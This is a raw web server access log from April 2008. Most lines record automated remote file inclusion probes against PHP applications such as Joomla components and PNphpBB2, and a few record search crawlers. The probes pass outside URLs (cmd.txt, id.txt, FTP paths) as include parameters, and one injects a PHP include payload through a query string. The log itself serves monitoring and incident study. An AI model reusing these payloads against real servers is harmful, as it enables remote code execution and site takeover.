67.201.13.98 - - [07/Apr/2008:12:33:49 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bogazlikoyu.com/media/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:12:34:25 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.148.50 - - [07/Apr/2008:12:34:26 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [07/Apr/2008:12:34:26 -0700] "GET /include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.148.50 - - [07/Apr/2008:12:34:26 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.105.33.158 - - [07/Apr/2008:12:34:47 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.119 - - [07/Apr/2008:12:34:51 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.215 - - [07/Apr/2008:12:34:52 -0700] "GET /logs/access_080105.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.105.33.158 - - [07/Apr/2008:12:34:55 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.105.33.158 - - [07/Apr/2008:12:35:03 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:12:35:37 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:12:35:37 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:12:35:38 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.213.222 - - [07/Apr/2008:12:35:41 -0700] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.213.222 - - [07/Apr/2008:12:35:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.213.222 - - [07/Apr/2008:12:35:42 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:12:35:42 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:12:35:43 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:12:35:43 -0700] "GET /include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.175.137.162 - - [07/Apr/2008:12:35:43 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:12:35:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.243 - - [07/Apr/2008:12:35:48 -0700] "GET /minamijewelry/source_images/updated1/?S=D HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:35:49 -0700] "GET /logs/access.log/index.php?side=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:35:49 -0700] "GET /logs/index.php?side=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.213.222 - - [07/Apr/2008:12:35:57 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:36:03 -0700] "GET /logs/access_080308.log/index.php?side=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:36:06 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:12:36:11 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:12:36:11 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.209.214 - - [07/Apr/2008:12:36:12 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.16.235 - - [07/Apr/2008:12:37:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.51.171 - - [07/Apr/2008:12:37:08 -0700] "GET /bikes/dteel/2008_02_08/?S=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:37:36 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:37:36 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.40.40 - - [07/Apr/2008:12:37:36 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:12:38:12 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:12:39:00 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:39:14 -0700] "GET /logs/access.log/voir.php?inc=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:39:14 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:12:39:37 -0700] "GET /logs/access_080215.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:12:39:38 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:39:55 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:39:55 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:40:13 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:40:13 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:40:17 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:12:40:57 -0700] "GET /logs/access_080207.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:12:40:57 -0700] "GET /index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:12:40:58 -0700] "GET /logs/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:41:19 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:41:19 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:12:41:28 -0700] "GET /logs/access_080128.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.27.8.25 - - [07/Apr/2008:12:42:03 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.27.8.25 - - [07/Apr/2008:12:42:05 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.27.8.25 - - [07/Apr/2008:12:42:07 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:42:11 -0700] "GET /logs/access_080312.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:42:11 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:42:11 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:12:42:12 -0700] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:43:39 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:43:40 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:43:40 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:43:49 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:43:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:43:50 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.214.45.149 - - [07/Apr/2008:12:44:31 -0700] "GET /minamijewelry/html/dream.html HTTP/1.0" 200 18217 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:12:44:43 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:12:44:43 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [07/Apr/2008:12:44:44 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.214.191 - - [07/Apr/2008:12:44:54 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.blackid.org/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:12:44:55 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.50.214.191 - - [07/Apr/2008:12:44:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.blackid.org/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:12:45:05 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:12:45:05 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:12:45:22 -0700] "GET /logs/access_070909.log HTTP/1.0" 200 75478 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:12:45:23 -0700] "GET /logs/access_071227.log HTTP/1.0" 200 452672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:12:45:23 -0700] "GET /logs/access_080227.log HTTP/1.0" 200 1421805 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:45:33 -0700] "GET /logs/access.log//trans/trans.php?trans=&p=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:45:33 -0700] "GET //trans/trans.php?trans=&p=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:12:45:34 -0700] "GET /logs//trans/trans.php?trans=&p=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.16.236.69 - - [07/Apr/2008:12:46:09 -0700] "GET /index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [07/Apr/2008:12:46:13 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [07/Apr/2008:12:46:13 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.27.8.25 - - [07/Apr/2008:12:46:41 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:46:41 -0700] "GET /index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:46:41 -0700] "GET /index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [07/Apr/2008:12:46:52 -0700] "GET /logs/access_080219.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:46:53 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:46:53 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.216.89 - - [07/Apr/2008:12:46:53 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.24.107 - - [07/Apr/2008:12:47:09 -0700] "GET //errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:47:12 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:47:13 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:12:47:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.16.236.69 - - [07/Apr/2008:12:47:26 -0700] "GET /logs/access_080207.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.16.236.69 - - [07/Apr/2008:12:47:26 -0700] "GET /logs/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:47:27 -0700] "GET /index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:47:28 -0700] "GET /logs/access_080118.log//inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.16.236.69 - - [07/Apr/2008:12:47:29 -0700] "GET /logs/access_080128.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:47:29 -0700] "GET //inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.248.163.135 - - [07/Apr/2008:12:47:30 -0700] "GET /logs//inc/cmses/aedating4CMS.php?dir[inc]=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:47:55 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:47:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
